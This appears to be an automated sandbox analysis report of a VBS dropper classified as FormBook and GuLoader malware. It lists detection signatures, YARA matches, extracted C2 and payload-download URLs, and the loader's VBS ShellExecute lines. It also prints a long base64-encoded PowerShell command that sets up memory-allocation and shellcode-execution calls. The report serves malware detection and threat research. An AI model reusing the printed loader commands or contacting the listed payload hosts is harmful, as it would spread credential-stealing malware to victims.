Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name: MTIR22024323_0553381487_20220112120005.vbs
Analysis ID: 552589
MD5: 564601676bee71f5f61a44ef170d92a6
SHA1: 76fca984dab2358e66524172e04a3528f33d8e18
SHA256: 5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags: vbs
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}
Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
Multi AV Scanner detection for submitted file
Source: MTIR22024323_0553381487_20220112120005.vbs ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

Networking:

barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.jewelrystore1.com/wk3t/
Source: Malware configuration extractor URLs: https://www.wizumiya.co.jp/html/user_da
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
Source: unknown DNS traffic detected: queries for: www.wizumiya.co.jp
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\cmstp.exe Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\cmstp.exe Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7149
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7149 Jump to behavior
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
